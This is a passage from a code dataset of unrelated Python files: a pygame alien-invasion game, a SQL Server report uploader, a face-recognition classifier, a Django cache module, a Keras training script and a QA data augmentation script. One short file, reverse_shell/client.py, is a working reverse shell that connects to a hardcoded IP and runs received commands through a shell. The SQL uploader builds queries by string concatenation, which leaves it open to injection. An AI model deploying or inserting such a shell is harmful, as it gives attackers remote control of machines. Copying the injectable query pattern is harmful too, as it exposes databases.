ships_left\n\t\t\tself.stats.ships_left -= 1\n\n\t\t\t# Clear the lists of aliens and bullets\n\t\t\tself.aliens.empty()\n\t\t\tself.bullets.empty()\n\n\t\t\t# Create a new fleet and center the ship\n\t\t\tself._create_fleet()\n\t\t\tself.ship.center_ship()\n\n\t\t\t# Pause\n\t\t\tsleep(0.5)\n\t\telse:\n\t\t\tself.stats.game_active = False\n\n\n\tdef _create_fleet(self):\n\t\t\"\"\"Create the alien invasion fleet\"\"\"\n\t\t# Create an alien and compute the number of aliens in a row\n\t\t# The spacing between adjacent aliens equals one alien width\n\t\talien = Alien(self)\n\t\talien_width, alien_height = alien.rect.size\n\t\tavailible_space_x = self.settings.game_screen_width - (2 * alien_width)\n\t\tnumber_aliens_x = availible_space_x // (2 * alien_width)\n\n\t\t\"\"\"Determine the number of rows that fit on the 
экране\"\"\"\n\t\tship_height = self.ship.rect.height\n\t\tavailible_space_y = (self.settings.game_screen_height - \n\t\t\t\t\t\t\t\t(3 * alien_height) - ship_height)\n\t\tnumber_rows = 5\n\n\t\t# Создание флота вторжения\n\t\tfor row_number in range(number_rows):\n\t\t\tfor alien_number in range(number_aliens_x):\n\t\t\t\tself._create_alien(alien_number, row_number)\n\n\tdef _check_fleet_edges(self):\n\t\t\"\"\"Реагирует на достижение пришельцем края экрана\"\"\"\n\t\tfor alien in self.aliens.sprites():\n\t\t\tif alien.check_edges():\n\t\t\t\tself._change_fleet_direction()\n\t\t\t\tbreak\n\n\tdef _change_fleet_direction(self):\n\t\t\"\"\"Опускает весь флот и меняет направление флота\"\"\"\n\t\tfor alien in self.aliens.sprites():\n\t\t\talien.rect.y += self.settings.fleet_drop_speed\n\t\tself.settings.fleet_direction *= -1\n\n\tdef _create_alien(self, alien_number, row_number):\n\t\t\"\"\"Создание пришельца и размещение его в ряду\"\"\"\n\t\talien = Alien(self)\n\t\talien_width, alien_height = alien.rect.size\n\t\talien.x = alien_width + 2 * alien_width * alien_number\n\t\talien.rect.x = alien.x\n\t\talien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n\t\tself.aliens.add(alien)\n\n\tdef _check_aliens_bottom(self):\n\t\t\"\"\"Проверяет, добрались ли пришельцы до нижнего края экрана\"\"\"\n\t\tscreen_rect = self.game_screen.get_rect()\n\t\tfor alien in self.aliens.sprites():\n\t\t\tif alien.rect.bottom >= screen_rect.bottom:\n\t\t\t\t# Происходит то же, что при столкновении с кораблём\n\t\t\t\tself._ship_hit()\n\t\t\t\tbreak\n\n\tdef _update_aliens(self):\n\t\t\"\"\"\n\t\tПроверяет, достиг ли флот края экрана,\n\t\tс последующим обновлением позиций всех пришельцев во флоте.\n\t\t\"\"\"\n\t\tself._check_fleet_edges()\n\t\tself.aliens.update()\n\n\t\t# Проверка коллизий \"пришелец - корабль\"\n\t\tif pygame.sprite.spritecollideany(self.ship, self.aliens):\n\t\t\tself._ship_hit()\n\n\t\t# Проверить, доюрались ли пришельцы до нижнего края экрана\n\t\tself._check_aliens_bottom()\n\n\tdef _arcade_frame(self):\n\t\t# Прорисовывет стилизованный арт в виде рамки\n\t\tself.frame = pygame.image.load('images/ai_bkg.bmp')\n\t\tself.screen.blit(self.frame, (0, 0))\n\n\nif __name__ == '__main__':\n\t# Создание экземпляра и запуск игры\n\tai = AlienInvasion()\n\tai.run_game()","sub_path":"Alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":8920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"350206408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nuse by weekly report, upload data to sql express\n\n@author: WeiDengt\n\"\"\"\nimport pyodbc\nimport datetime\n\nclass ToMSSQL:\n def __init__(self):\n self.conn=pyodbc.connect('Driver={SQL Server};'\n 'Server=AES-RPT01\\SQLEXPRESS;'\n 'Database=WeeklyTKSummary;'\n 'Trusted_Connection=yes;')\n \n def insertCompletedTK(self,df):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from dbo.CompletedTickets\")\n \n for i in range(len(df)):\n #replace \"'\" and \"\"\" to \"\" before insert into database table\n \n title=str(df['TicketTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n 
values_str=\"('\"+df['FullName'][i]+\"','\"+df['TicketNumber'][i]+\"','\"+title+\"','\"+str(df['IssueType'][i])+\"','\"+df['SubIssueType'][i]+\"','\"+str(df['CreateDateTime'][i])+\"','\"+str(df['FirstAssignedDateTime'][i])+\"','\"+str(df['SLAFirstResponseDateTime'][i])+\"','\"+str(df['SLAResolvedDateTime'][i])+\"','\"+str(df['Status'][i])+\"','\"+str(df['Account'][i])+\"','\"+str(df['Queue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[CompletedTickets] ([FullName],[TicketNumber],[TicketTitle],[IssueType],[SubIssueType],[CreateDateTime],[FirstAssignedDateTime],[SLAFirstResponseDateTime],[SLAResolvedDateTime],[Status],[Account],[Queue]) VALUES \" +values_str \n cursor.execute(sqlstr)\n \n \n self.conn.commit()\n \n #self.conn.close()\n\n \n def insertAssignedTK(self,df):\n\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from AssignedTickets\")\n\n for i in range(len(df)):\n \n title=str(df['TicketTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+df['FullName'][i]+\"','\"+df['TicketNumber'][i]+\"','\"+title+\"','\"+df['Account'][i]+\"','\"+str(df['SLAStartDateTime'][i])+\"','\"+str(df['SLAFirstResponseDateTime'][i])+\"','\"+str(df['FirstAssignedDateTime'][i])+\"','\"+df['IssueType'][i]+\"','\"+df['SubIssueType'][i]+\"','\"+str(df['Status'][i])+\"','\"+str(df['Queue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[AssignedTickets] ([FullName],[TicketNumber],[TKTitle],[AccountName],[SLAStartDateTime],[SLAFirstResponseDate],[FirstAssigned],[Issue],[SubIssue],[Status],[Queue]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close()\n \n \n def insertIdleTK(self,df):\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from idleNotification\")\n\n for i in range(len(df)):\n \n title=str(df['TKTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+str(df['sentDate'][i])+\"','\"+df['Resource'][i]+\"','\"+df['TKNum'][i]+\"','\"+title+\"','\"+str(int(df['IdleHours'][i]))+\"')\"\n sqlstr=\"insert into [dbo].[idleNotification] ([sentDate],[Resource],[TKNum],[TKTitle],[IdleHours]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close() \n\n\n def insertSLANotMetTK(self,df):\n\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from SLA_No\")\n\n for i in range(len(df)):\n \n values_str=\"('\"+df['TKNumber'][i]+\"','\"+df['AccountName'][i]+\"','\"+df['Priority'][i]+\"','\"+df['Status'][i]+\"','\"+df['ContactName'][i]+\"','\"+df['Source'][i]+\"','\"+df['Issue'][i]+\"','\"+df['SubIssue'][i]+\"','\"+str(df['FRDateTime'][i])+\"','\"+str(df['FRDueDateTime'][i])+\"','\"+str(int(df['FR_SLAMet'][i]))+\"','\"+str(df['SLVDateTime'][i])+\"','\"+str(df['SLVDueDateTime'][i])+\"','\"+str(int(df['Actual SLA Met Tickets'][i]))+\"','\"+str(df['QueueID'][i])+\"','\"+str(int(df['Final'][i]))+\"')\"\n sqlstr=\"insert into [dbo].[SLA_No] ([TKNumber],[AccountName],[Priority],[Status],[ContactName],[Source],[Issue],[SubIssue],[FRDateTime],[FRDueDateTime],[FR_SLAMet],[SLVDateTime],[SLVDueDateTime],[ActualSLAMetTickets],[QueueID],[Final]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close()\n\n\n def insertWorkHoursTK(self,df):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from WorkedHours\")\n\n for i in 
range(len(df)):\n \n title=str(df['TKTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+df['FullName'][i]+\"','\"+str(df['HoursWorked'][i])+\"','\"+df['ProjectName'][i]+\"','\"+df['ProjectStatus'][i]+\"','\"+str(df['AccountName'][i])+\"','\"+title+\"','\"+str(df['TKNum'][i])+\"','\"+str(df['WorkedDate'][i])+\"','\"+df['Queue'][i]+\"','\"+df['Issue'][i]+\"','\"+str(df['SubIssue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[WorkedHours] ([FullName],[HoursWorked],[ProjectName],[ProjectStatus],[AccountName],[TaskorTicketTitle],[TaskTicketNumber],[WorkedDate],[QueueName],[Issue],[SubIssue]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n def updateDocControl(self,lastUpdate,timeDiff):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from DocControl\")\n \n values_str=\"('Title: ','Ticket Summary for Current week')\"\n sqlstr=\"insert into [dbo].[DocControl] ([DocControlItem],[Value]) VALUES\" +values_str \n cursor.execute(sqlstr)\n \n updatedAt=lastUpdate+datetime.timedelta(hours=timeDiff)\n last=str(updatedAt.year)+\"-\"+str(updatedAt.month)+\"-\"+str(updatedAt.day)+\" \"+str(updatedAt.hour)+\":00\"\n values_str=\"('Last Update:','\"+str(last)+\"')\"\n sqlstr=\"insert into [dbo].[DocControl] ([DocControlItem],[Value]) VALUES\" +values_str \n cursor.execute(sqlstr)\n self.conn.commit()\n #self.conn.close()\n\n## \n# def closeConn(self):\n# self.conn.close()\n \n","sub_path":"WeeklyOnlinePBI/Weekly_Report_toSQLEXPClassFile.py","file_name":"Weekly_Report_toSQLEXPClassFile.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"229254397","text":"import os\nimport socket\nimport subprocess\n\ns = socket.socket()\nhost = '192.168.105.102'\nport = 9998\ns.connect((host,port))\n\nwhile True:\n\tdata = s.recv(1024)\n\tif data[:2].decode(\"utf-8\") == 'cd':\n\t\tos.chdir(data[3:].decode(\"utf-8\"))\n\n\tif len(data) > 0:\n\t\tcommand = subprocess.Popen(data[:].decode(\"utf-8\"),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\toutput_bytes = command.stdout.read() + command.stderr.read()\n\t\toutput_string = str(output_bytes,\"utf-8\")\n\t\ts.send(str.encode(output_string + str(os.getcwd()) + '>' ))\n\t\tprint(output_string)\n\ns.close()","sub_path":"reverse_shell/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"572895959","text":"# Take2\n#second attempt at learning terminal commands\ndef demographics():\n name = input(\"What's your name? \")\n age = int(input(\"\\nHow old are you? \"))\n if(age >= 21):\n print(\"\\nGood. Proceed to the next processing phase:\")\n else:\n print(\"\\nYou're not old enough. 
Please exit the premises\")\n return\n return name\ndef specialties():\n print(\"\\nPlease enter your experience/specialties from the following list:\")\n print(\"\\nhand2hand\\tsabotage\\tdemolition\\tespionage\\nrecon\\tcyber\\tfirearms\\tsurveillance\\ninterrogation\")\n skills = str(input(\"\\nMy skills are: \"))\n#match the entered skill against the known skill groups for work assignment\n if(skills in ('cyber', 'surveillance')):\n print(\"\\nYou will work in hq\")\n elif(skills in (\"hand2hand\", \"interrogation\", \"demolition\", \"recon\", \"sabotage\")):\n print(\"\\nThe field is where you belong\")\n else:\n print(\"Unfortunately, the CIA does not need your services\")\n return\n print(\"\\nThanks for choosing the Central Intelligence Agency as your place of occupation\")\n \ndef experience():\n xp = int(input(\"How many years of experience do you have?\"))\n\ndef main():\n demographics()\n specialties()\n# experience()\nmain()\n","sub_path":"CIA_Vetting.py","file_name":"CIA_Vetting.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"616430379","text":"# USAGE\n# python eigenfaces.py --input caltech_faces --visualize 1\n\n# import the necessary packages\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom skimage.exposure import rescale_intensity\nfrom face import load_face_dataset\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom imutils import build_montages\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\n\n# input argument\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", type=str, required=True,help=\"path to input directory of images\")\nap.add_argument(\"-f\", \"--face\", type=str,default=\"face_detector\",help=\"path to face detector model directory\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5,help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-n\", \"--num-components\", type=int, default=150,help=\"# of principal components\")\nap.add_argument(\"-m\",\"--classifier\",type=str,default='svm')\nargs = vars(ap.parse_args())\n\n# load face detector\nprint(\"[INFO] loading face detector model...\")\nprototxtPath = os.path.sep.join([args[\"face\"], \"deploy.prototxt\"])\nweightsPath = os.path.sep.join([args[\"face\"],\"res10_300x300_ssd_iter_140000.caffemodel\"])\nnet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n# load the image dataset\nprint(\"[INFO] loading dataset...\")\n(faces, labels) = load_face_dataset(args[\"input\"], net,minConfidence=0.8, minSamples=5)\nprint(\"[INFO] {} images in dataset\".format(len(faces)))\n\n# flatten 2D data into 1D data\npcaFaces = np.array([f.flatten() for f in faces])\n\n# encode the string labels as integers\nle = LabelEncoder()\nlabels = le.fit_transform(labels)\n\n# construct our training and testing split\nsplit = train_test_split(faces, pcaFaces, labels, test_size=0.25,stratify=labels, random_state=42)\n(origTrain, origTest, trainX, testX, trainY, testY) = split\n\n# compute the PCA (eigenfaces) representation of the data, then\n# project the training data onto the eigenfaces subspace\nprint(\"[INFO] creating 
eigenfaces...\")\npca = PCA(svd_solver=\"randomized\",n_components=args[\"num_components\"],whiten=True)\nstart = time.time()\ntrainX = pca.fit_transform(trainX)\nend = time.time()\nprint(\"[INFO] computing eigenfaces took {:.4f} seconds\".format(end - start))\n\n\n#model selection\nif args[\"classifier\"]=='svm':\n model = SVC(kernel=\"rbf\", C=10.0, gamma=0.001, random_state=42)\nelif args[\"classifier\"]=='knn':\n model=KNeighborsClassifier(n_neighbors=3,weights=\"distance\")\nelif args[\"classifier\"]=='lda':\n model=LinearDiscriminantAnalysis()\nelse:\n print('input correct classifier!')\n exit(-1)\n# train a classifier on the eigenfaces representation\nprint(\"[INFO] training classifier...\")\nmodel.fit(trainX, trainY)\n\n# evaluate the model\nprint(\"[INFO] evaluating model...\")\npredictions = model.predict(pca.transform(testX))\nprint('{} prediction :'.format(args[\"classifier\"]))\nprint(classification_report(testY, predictions,target_names=le.classes_))\n\n","sub_path":"eigenfaces.py","file_name":"eigenfaces.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"391679822","text":"import datetime\nimport hashlib\nimport logging\ntry:\n unicode = unicode\nexcept NameError: # 'unicode' is undefined => Python 3\n unicode = str\n bytes = bytes\n basestring = (str, bytes)\nelse: # 'unicode' exists => Python 2\n unicode = unicode\n bytes = str\n basestring = basestring\n\nfrom django.conf import settings\nfrom django.core.cache import cache as default_cache\nfrom django.core.cache.backends.base import InvalidCacheBackendError\nfrom django.db.models import Model\nfrom django.utils import encoding, translation\n\nfrom .compat import get_cache, DEFAULT_TIMEOUT\n\n# Look for an own cache first before falling back to the default cache\ntry:\n cache = get_cache('cache_machine')\nexcept (InvalidCacheBackendError, ValueError):\n cache = default_cache\n\n\nCACHE_PREFIX = getattr(settings, 'CACHE_PREFIX', '')\nFETCH_BY_ID = getattr(settings, 'FETCH_BY_ID', False)\nFLUSH = CACHE_PREFIX + ':flush:'\n\nlog = logging.getLogger('caching.invalidation')\n\n\ndef make_key(k, with_locale=True):\n \"\"\"Generate the full key for ``k``, with a prefix.\"\"\"\n key = encoding.smart_str('%s:%s' % (CACHE_PREFIX, k))\n if with_locale:\n key += encoding.smart_str(translation.get_language())\n # memcached keys must be < 250 bytes and w/o whitespace, but it's nice\n # to see the keys when using locmem.\n return hashlib.md5(key.encode('utf-8')).hexdigest()\n\n\ndef get_root_key(model):\n key = getattr(model, '__caching_root_key', None)\n if not key:\n # In case of inheritance, ensure the base model is always used as the root key.\n classes = [model]\n base_model = model\n while classes:\n class_ = classes.pop(0)\n if issubclass(class_, Model):\n base_model = class_\n classes += list(class_.__bases__)\n\n key = make_key('caching:root:%s' % hash(base_model))\n model.__caching_root_key = key\n return key\n\n\ndef cache_get(model, key, default=None):\n \"\"\"\n Retrieves the cache item for the given key.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n key: string\n default: anything or None\n\n returns: anything or None\n \"\"\"\n root_key = get_root_key(model)\n prefix = cache.get(root_key)\n if prefix is None:\n return default\n\n key = make_key(prefix + key)\n return cache.get(key, default=default)\n\n\ndef cache_set(model, key, value, 
timeout=None, root_key=None, root_timeout=None):\n \"\"\"\n Sets the cache item for the given key.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n key: string\n value: anything\n timeout: int or None\n root_timeout: int or None\n\n returns: None\n \"\"\"\n if root_timeout is None:\n root_timeout = DEFAULT_TIMEOUT\n if timeout is None:\n timeout = DEFAULT_TIMEOUT\n\n root_key = get_root_key(model)\n prefix = cache.get(root_key)\n if prefix is None:\n prefix = datetime.datetime.now().isoformat()\n cache.set(root_key, prefix, root_timeout)\n\n key = make_key(prefix + key)\n cache.set(key, value, timeout)\n\n\ndef cache_set_many(model, items, timeout=None, root_key=None, root_timeout=None):\n \"\"\"\n Sets multiple cache key-item pairs.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n items: {key (anything): value (anything)}\n timeout: int or None\n root_timeout: int or None\n\n returns: None\n \"\"\"\n if root_timeout is None:\n root_timeout = DEFAULT_TIMEOUT\n if timeout is None:\n timeout = DEFAULT_TIMEOUT\n\n root_key = get_root_key(model)\n prefix = cache.get(root_key)\n if prefix is None:\n prefix = datetime.datetime.now().isoformat()\n cache.set(root_key, prefix, root_timeout)\n\n items = {make_key(prefix + key): value for key, value in items.items()}\n cache.set_many(items, timeout=timeout)\n\n\ndef cache_clear_root(model):\n \"\"\"\n Clears the root key for the given model.\n \"\"\"\n root_key = get_root_key(model)\n cache.delete(root_key)\n\n\ndef byid(obj):\n key = obj if isinstance(obj, basestring) else obj.cache_key\n return make_key('byid:' + key)\n","sub_path":"caching/invalidation.py","file_name":"invalidation.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"432252385","text":"import codecs\n\nfrom setuptools import setup, find_packages\n\npackages = find_packages(include=['bloomberg', 'bloomberg.*'])\n\nwith codecs.open('README.md','r','utf-8') as f:\n readme = f.read()\n\nsetup(\n name='bloomberg-api',\n author='Quassel',\n author_email='sandro.braun@quassel.li',\n version='0.1',\n description='Wrapper for the bloomberg API',\n keywords=['bloomberg', 'finance', 'data'],\n long_description=readme,\n packages=packages\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40010679","text":"from keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import MobileNetV2, ResNet50\nfrom keras.layers import Dense, Flatten, AveragePooling2D, Dropout\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nimport numpy as np\nimport argparse\nimport sys\n\n# Constant values\nN_SAMPLES_TRAIN = 498\nVAL_SPLIT = 0.2\nN_TRAIN_SAMPLES = int(N_SAMPLES_TRAIN * (1 - VAL_SPLIT) + 1)\nN_VAL_SAMPLES = int(N_SAMPLES_TRAIN * VAL_SPLIT)\nIMAGE_WIDTH = IMAGE_HEIGHT = 256\nBATCH_SIZE = 10\n\n# Argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", choices=[\"MobileNetV2\", \"ResNet50\"], default=\"MobileNetV2\")\nargs = vars(ap.parse_args())\nmodel_type = args[\"model\"]\n\nprint(\"[INFO] Loading 
data...\")\n\ntrain_dir = \"dataset/train\"\n\n# All images will be rescaled by 1./255\ntrain_datagen = ImageDataGenerator(rescale=1. / 255, validation_split=VAL_SPLIT)\n#train_datagen = ImageDataGenerator(rescale=1. / 255, rotation_range=45, zoom_range=0.15, width_shift_range=0.2,\n# height_shift_range=0.2, horizontal_flip=True, validation_split=VAL_SPLIT)\n\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=(IMAGE_HEIGHT, IMAGE_WIDTH), shuffle=True,\n seed=13, batch_size=BATCH_SIZE, class_mode='binary',\n subset=\"training\")\nval_generator = train_datagen.flow_from_directory(train_dir, target_size=(IMAGE_HEIGHT, IMAGE_WIDTH), shuffle=True,\n seed=13, batch_size=BATCH_SIZE, class_mode='binary',\n subset=\"validation\")\n\nK.clear_session()\n\nprint(\"[INFO] Compiling model...\")\n# Model definition\nshape = (IMAGE_HEIGHT, IMAGE_WIDTH, 3)\nif model_type == \"MobileNetV2\":\n base_model = MobileNetV2(input_shape=shape, weights='imagenet', include_top=False)\nelif model_type == \"ResNet50\":\n base_model = ResNet50(input_shape=shape, weights='imagenet', include_top=False)\nelse:\n sys.exit(\"Error in model name\")\nhead_model = base_model.output\nhead_model = AveragePooling2D(pool_size=(4, 4))(head_model)\nhead_model = Flatten(name=\"flatten\")(head_model)\nhead_model = Dense(128, activation=\"relu\")(head_model)\nhead_model = Dropout(0.5)(head_model)\nhead_model = Dense(1, activation=\"sigmoid\")(head_model)\nmodel = Model(inputs=base_model.input, outputs=head_model)\nprint(model.summary())\n\n# Callbacks definitions\nlr_scheduler = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, min_lr=1e-9)\nearly_stop = EarlyStopping(monitor=\"val_loss\", mode='min', verbose=1, patience=20)\nif model_type == \"MobileNetV2\":\n mcp_save = ModelCheckpoint('MobileNetV2_wts.hdf5', save_best_only=True, monitor=\"val_loss\", mode='min')\nelif model_type == \"ResNet50\":\n mcp_save = ModelCheckpoint('ResNet50_wts.hdf5', save_best_only=True, monitor=\"val_loss\", mode='min')\ntb = TensorBoard(log_dir=\"logs\")\ncallbacks_list = [early_stop, mcp_save, lr_scheduler, tb]\n\n# Optimizer definition\nopt = Adam(lr=1e-5)\nmodel.compile(loss=\"binary_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\nprint(\"[INFO] Training model...\")\nhistory = model.fit_generator(train_generator, epochs=100, steps_per_epoch=N_TRAIN_SAMPLES // BATCH_SIZE,\n validation_data=val_generator, validation_steps=N_VAL_SAMPLES // BATCH_SIZE, verbose=2,\n callbacks=callbacks_list)\n\n# Best accuracy\n[best_loss, best_ep] = [np.min(history.history[\"val_loss\"]), np.argmin(history.history[\"val_loss\"])]\n\nprint(\"Best loss: {:.4f} Epoch: {}\".format(best_loss, best_ep))\n","sub_path":"pretrained.py","file_name":"pretrained.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"280419393","text":"import json\n# for now we import sys for fast research \nimport sys\nimport random\n\ndef main():\n\t# usage: python3 agumentate_policy.py policy_file.json positive_sub_sampling new.json\n\t# opening the json file\n\tfile = open(sys.argv[1], \"r\")\n\n\t# dictionary keys for better create documents\n\tfields = ['QUESTION_ID', 'QUESTION_TITLE', 'QUESTION_TEXT', 'DOCUMENT', 'ANSWER', 'START_OFFSET', 'END_OFFSET', 'ANSWERABLE', 'DOC_IDS']\n\n\t# return json object (list of dictionary)\n\tdata = 
json.load(file)\n\n\tprint(data.keys())\n\tprint(len(data[\"data\"]))\n\tprint(data[\"data\"][0].keys())\n\tprint(len(data[\"data\"][0][\"paragraphs\"]))\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0]))\n\tprint(data[\"data\"][0][\"paragraphs\"][0].keys())\t\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0][\"qas\"]))\t\n\tprint(data[\"data\"][0][\"paragraphs\"][0][\"qas\"][0].keys())\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0][\"qas\"][0][\"answers\"]))\n\tc = 0\n\tfor p in data[\"data\"]:\n\t\tfor s in p[\"paragraphs\"]:\n\t\t\tfor qas in s[\"qas\"]:\n\t\t\t\tc += 1\n\tprint(c)\n\n\t\n\n\t# initial new data dictionary\n\tnew_data = {\"version\": data[\"version\"], 'data': []}\n\n\tfor sample in data[\"data\"]: # this is to traverse through the list of policies. \n\t# each policy contains a policy title and the paragraphs.\n\t\t# create new policy to append to new_data dictionary\n\t\tnew_policy = {'title': sample['title'], 'paragraphs': []}\n\t\tfor p in sample['paragraphs']: # each p is a dict {qas, index, context, and summary}\n\t\t\t# create new paragraph here to append to new_policy\n\t\t\tnew_p = {\"qas\": [], \"index\": p[\"index\"], \"context\": p[\"context\"], \"summary\": p[\"summary\"]}\n\t\t\tfor q in p[\"qas\"]: # now getting hold of each question for each p (paragraph) in paragraphs \n\t\t\t\t# first we need to add any question from original p[\"qas\"] to this\n\t\t\t\tif len(q[\"answers\"]) == 0:\n\t\t\t\t\tprint(\"found original empty!!!!!!!!\")\n\t\t\t\tnew_p[\"qas\"].append(q)\n\t\t\t\t# Then using a random number here to make sure that we can get the 20%, 40%, 60%, 80% augmentation percentage\n\t\t\t\tif random.random() <= float(sys.argv[2]):\t\n\t\t\t\t\t# create new question (5, 5):\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"1\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (5, 5)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) + 5\n\t\t\t\t\t\tnew_start = ans[\"answer_start\"] + 5\n\t\t\t\t\t\t# create new answer for this question\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tif new_start < len(p[\"context\"]):\n\t\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\n\t\t\t\t\t# create new sample (-5, -5)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"2\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (-5, -5)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) - 5\n\t\t\t\t\t\tnew_start = max(0, ans[\"answer_start\"] - 5)\n\t\t\t\t\t\t# create new answer for this question\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\n\t\t\t\t\t# create new sample (-5, 0)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"3\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (-5, 0)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"])\n\t\t\t\t\t\tnew_start = max(0, 
ans[\"answer_start\"] - 5)\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\n\t\t\t\t\t# create new sample (0, -5)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"4\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (0, 15)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) - 5\n\t\t\t\t\t\tnew_start = ans[\"answer_start\"]\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\t\t# shuffle the question.\n\t\t\t\t\trandom.shuffle(new_p[\"qas\"])\n\t\t\t# append new paragraph to 